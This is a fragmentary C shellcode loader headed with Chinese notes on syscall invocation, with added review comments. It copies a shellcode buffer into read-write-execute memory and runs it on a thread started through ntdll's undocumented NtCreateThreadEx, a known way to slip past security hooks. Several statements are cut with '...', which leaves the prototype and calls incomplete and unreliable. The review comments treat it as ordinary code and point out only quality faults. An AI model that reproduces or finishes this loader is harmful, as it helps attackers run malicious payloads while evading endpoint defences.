syscall调用
#include
#include
// NOTE(review): the two #include lines above lost their header names in this
// excerpt; the types used here (NTSTATUS, PHANDLE, SIZE_T, PVOID) are Win32/NT
// types, so a Windows SDK header was presumably included — confirm against the
// original source.
// Hand-written prototype for ntdll's NtCreateThreadEx, which has no public SDK
// header. Most of the parameter list is elided ("...") in this excerpt, so the
// argument order used by the call in main() cannot be checked against it here.
// SAL annotations (IN/OUT) are informational only; the compiler does not enforce them.
EXTERN_C NTSTATUS NtCreateThreadEx
(
OUT PHANDLE...SizeOfStackCommit,
IN SIZE_T SizeOfStackReserve,
OUT PVOID lpBytesBuffer
);
// Demonstration entry point: copies a byte buffer into writable+executable memory
// and starts a thread on it through NtCreateThreadEx. Several statements are
// elided ("...") in this excerpt, so the comments below cover only what is visible.
// Returns: nothing explicit; main() falls off the end (0 in C99+).
int main()
{
// The allocation call itself is elided; only PAGE_EXECUTE_READWRITE is visible, so
// the buffer is mapped RWX (W^X is not honoured — a risk in any production code).
// No NULL check on `exec` is visible before the memcpy below.
HANDLE pHandle...PAGE_EXECUTE_READWRITE);
// `shellcode` is defined outside this excerpt; sizeof shellcode equals the payload
// length only if it is a genuine array, not a pointer — TODO confirm.
memcpy(exec, shellcode, sizeof shellcode);
// hModule is never referenced in the visible lines and its NULL result is not
// checked; presumably a GetProcAddress lookup sits in the elided part of the next
// line — verify against the full source.
HMODULE hModule = LoadLibrary(L"ntdll.dll");
// Appears to assign the current-process pseudo-handle to pHandle; the elision may
// hide further statements.
pHandle...= GetCurrentProcess();
// 0x1FFFFF matches THREAD_ALL_ACCESS on Vista and later. `exec` sits in the
// position the usual NtCreateThreadEx prototype uses for the start routine. The
// NTSTATUS result is discarded, so on failure tHandle is left unset and the
// CloseHandle below operates on an indeterminate value.
NtCreateThreadEx(&tHandle, 0x1FFFFF, NULL, pHandle, exec, NULL, FALSE,
NULL..., NULL, NULL, NULL);
// Fixed 1 s delay instead of WaitForSingleObject(tHandle, ...): the process can
// exit before the new thread has finished.
Sleep(1000);
CloseHandle(tHandle);
// GetCurrentProcess() returns a pseudo-handle; CloseHandle on it is a harmless no-op.
CloseHandle(pHandle);
}
通过汇编直接调用NtCreateThreadEx